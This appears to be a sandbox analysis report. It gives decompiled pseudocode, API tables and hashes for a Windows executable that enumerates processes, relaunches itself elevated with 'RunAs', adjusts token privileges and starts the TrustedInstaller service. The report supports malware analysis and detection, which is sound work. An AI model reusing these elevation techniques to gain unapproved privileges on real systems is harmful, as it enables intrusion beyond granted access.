				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(Process32NextW(_v12,  &_v1136) != 0) {
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}

0x00409609
0x0040960f
0x00409619
0x00409623
0x0040962e
0x00409633
0x00409640
0x0040964a
0x00409782
0x0040965a
0x0040965f
0x00409678
0x0040967e
0x00409681
0x00409685
0x00409688
0x004096b2
0x004096bf
0x004096c6
0x004096cb
0x004096da
0x004096e6
0x0040973b
0x00409747
0x0040975f
0x00409764
0x0040976a
0x00409770
0x00409773
0x0040977d
0x00000000
0x0040977d
0x004096ee
0x004096f5
0x004096fc
0x00409704
0x0040970c
0x0040971c
0x0040971c
0x00409704
0x00409721
0x00409728
0x00409739
0x00409739
0x00000000
0x00409728
0x00409693
0x00000000
0x00000000
0x004096a5
0x004096a9
0x004096ac
0x00000000
0x00000000
0x00000000
0x004096ac
0x004097a6

APIs

Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB

CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
memset.MSVCRT ref: 0040962E
Process32FirstW.KERNEL32(?,?), ref: 0040964A
OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
memset.MSVCRT ref: 004096C6
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Strings

QueryFullProcessImageNameW, xrefs: 00409706
kernel32.dll, xrefs: 004096F7

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 239888749-1740548384
Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}

0x00401c31
0x00401c33
0x00401c48
0x00401c4f
0x00401c61
0x00401c68
0x00401c74
0x00401c79
0x00401c7a
0x00401c7b
0x00401c84
0x00401c89
0x00401c8e
0x00401c8f
0x00401c9b
0x00401ca6
0x00401caf
0x00401cb9
0x00401cc0
0x00401cc7
0x00401cce
0x00401cd5
0x00401cdd
0x00401ce0
0x00401d14
0x00401ce2
0x00401ce8
0x00401cf3
0x00401cf6
0x00401cfe
0x00401d09
0x00401d09
0x00401cfe
0x00401d1b

APIs

GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
memset.MSVCRT ref: 00401C4F
memset.MSVCRT ref: 00401C68

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00401C8F
memset.MSVCRT ref: 00401C9B
ShellExecuteExW.SHELL32(?), ref: 00401CD5
WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
GetExitCodeProcess.KERNELBASE ref: 00401CF6
GetLastError.KERNEL32 ref: 00401D0E

Strings

@, xrefs: 00401CC7
/SpecialRun %I64x %d, xrefs: 00401C84
RunAs, xrefs: 00401CC0
<, xrefs: 00401CB9

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
String ID: /SpecialRun %I64x %d$<$@$RunAs
API String ID: 903100921-3385179869
Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}

0x00408fc9
0x00408fd0
0x00408fe8
0x00000000
0x00408fea
0x00408ff4
0x00409001
0x00409003
0x0040900c
0x0040900e
0x00409010
0x0040901a
0x0040901a
0x00409010
0x0040901f
0x00409026
0x0040902d
0x00409030
0x00409035
0x00409037
0x00409040
0x00409042
0x00409044
0x00409051
0x00409051
0x00409044
0x00409053
0x0040905e
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

GetLastError.KERNEL32(00000000), ref: 00408FEA
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E

Strings

LookupPrivilegeValueW, xrefs: 00409005
AdjustTokenPrivileges, xrefs: 00409039

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
API String ID: 616250965-1253513912
Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68

Uniqueness

Uniqueness Score: -1.00%

Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t9;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					_t9 = QueryServiceStatus(_t14,  &_v32); // executed
					if(_t9 != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}

0x00401319
0x0040131b
0x00401327
0x0040132b
0x00401332
0x0040133a
0x0040134b
0x0040134b
0x0040134e
0x0040134e
0x00401353
0x0040135b

APIs

OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353

Strings

TrustedInstaller, xrefs: 00401311

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseHandle$OpenQueryStartStatus
String ID: TrustedInstaller
API String ID: 862991418-565535830
Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

0x0040a348
0x0040a34e
0x0040a352
0x0040a35f
0x0040a363
0x0040a369
0x0040a371
0x0040a374
0x0040a37c
0x0040a380
0x0040a383
0x0040a386
0x0040a388
0x0040a388
0x0040a38c
0x0040a38f
0x0040a39f
0x0040a3a1
0x0040a3a5
0x0040a3a5
0x0040a3a9
0x0040a3aa
0x0040a3b3
0x0040a3b3
0x0040a37c
0x0040a371
0x0040a3b8
0x0040a3be

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
SizeofResource.KERNEL32(?,00000000), ref: 0040A359
LoadResource.KERNEL32(?,00000000), ref: 0040A369
LockResource.KERNEL32(00000000), ref: 0040A374

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88

Uniqueness

Uniqueness Score: -1.00%

Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

0x004022d5
0x004022dd
0x004022e7
0x004022ec
0x004022f7
0x004022fa
0x004022fd
0x00402300
0x00402307
0x0040230d
0x0040230e
0x00402318
0x00402321
0x00402324
0x00402327
0x0040232a
0x0040232d
0x00402334
0x00402337
0x0040233e
0x0040234f
0x00402356
0x0040235b
0x0040235e
0x0040236d
0x00402374
0x0040237e
0x00402395
0x004023a0
0x004023a0
0x004023ac
0x004023cf
0x004023d2
0x004023d9
0x004023de
0x004023f6
0x00402403
0x00402414
0x00402419
0x00402403
0x0040241a
0x00402423
0x00402458
0x0040245d
0x00402464
0x00402467
0x00402468
0x00000000
0x00000000
0x00000000
0x00402425
0x00402428
0x0040242b
0x00402433
0x00402434
0x00402473
0x00402473
0x0040247c
0x00402481
0x00402488
0x00402488
0x00402495
0x0040249a
0x004024b7
0x004024be
0x004024cd
0x004024d1
0x004024ed
0x004024f0
0x00402506
0x0040250b
0x00402512
0x00402518
0x00402519
0x0040251e
0x00402524
0x00402527
0x0040252b
0x00402530
0x00402531
0x00402531
0x0040253d
0x0040255a
0x00402561
0x00402570
0x00402574
0x00402590
0x00402593
0x004025a9
0x004025ae
0x004025b5
0x004025bb
0x004025bc
0x004025c1
0x004025c7
0x004025ca
0x004025cd
0x004025ce
0x004025d4
0x004025d4
0x004025da
0x004025e3
0x004025eb
0x00402633
0x004025fb
0x00402608
0x0040260f
0x00402614
0x00402624
0x00402630
0x00402630
0x0040263a
0x0040263b
0x00402646
0x0040264b
0x0040264c
0x0040265a
0x0040265a
0x0040265d
0x00402666
0x00402668
0x00402668
0x00402672
0x00402675
0x0040267e
0x0040267e
0x00402683
0x0040268b
0x0040269e
0x0040269e
0x004026a3
0x004026ac
0x004026b5
0x004026b8
0x00000000
0x00000000
0x004026ba
0x00000000
0x004026ae
0x004026ae
0x004026bf
0x004026c1
0x004026c6
0x004026cc
0x004026d5
0x004026db
0x004026e4
0x004026ea
0x004026f3
0x004026f9
0x00402707
0x00402707
0x0040270d
0x00402710
0x0040276d
0x00402770
0x0040280b
0x0040280e
0x00402813
0x00402810
0x00402810
0x00402810
0x00402819
0x0040281f
0x00402836
0x00402841
0x00402846
0x0040284a
0x00402851
0x00402857
0x00402860
0x00402865
0x00402876
0x00402879
0x00402888
0x00402888
0x00402857
0x00402891
0x0040289c
0x0040289c
0x00402779
0x00402784
0x0040278d
0x004027a4
0x004027b3
0x004027b8
0x004027bb
0x004027bf
0x004027c6
0x004027c6
0x004027d1
0x004027d6
0x004027d9
0x004027db
0x004027e2
0x004027e4
0x004027e4
0x004027e7
0x004027f4
0x004027fc
0x00402801
0x00402801
0x00402803
0x00402803
0x00402806
0x00000000
0x00402806
0x00402715
0x00402729
0x0040272e
0x00402731
0x00402738
0x00402738
0x00402743
0x00402748
0x0040274d
0x00402754
0x00402756
0x00402756
0x00402759
0x00402763
0x00000000
0x00402763
0x004026fb
0x00402700
0x00402702
0x00000000
0x00402702
0x004026ec
0x00000000
0x004026ec
0x004026dd
0x00000000
0x004026dd
0x004026ce
0x00000000
0x004026ce
0x004026ac
0x00402443
0x0040246a
0x00402470
0x00000000
0x00402470

APIs

memset.MSVCRT ref: 00402300
memset.MSVCRT ref: 0040233E
memset.MSVCRT ref: 00402356

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

wcschr.MSVCRT ref: 00402387
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0

Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69

wcschr.MSVCRT ref: 004023B7
memset.MSVCRT ref: 004023D9
SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
wcschr.MSVCRT ref: 0040242B
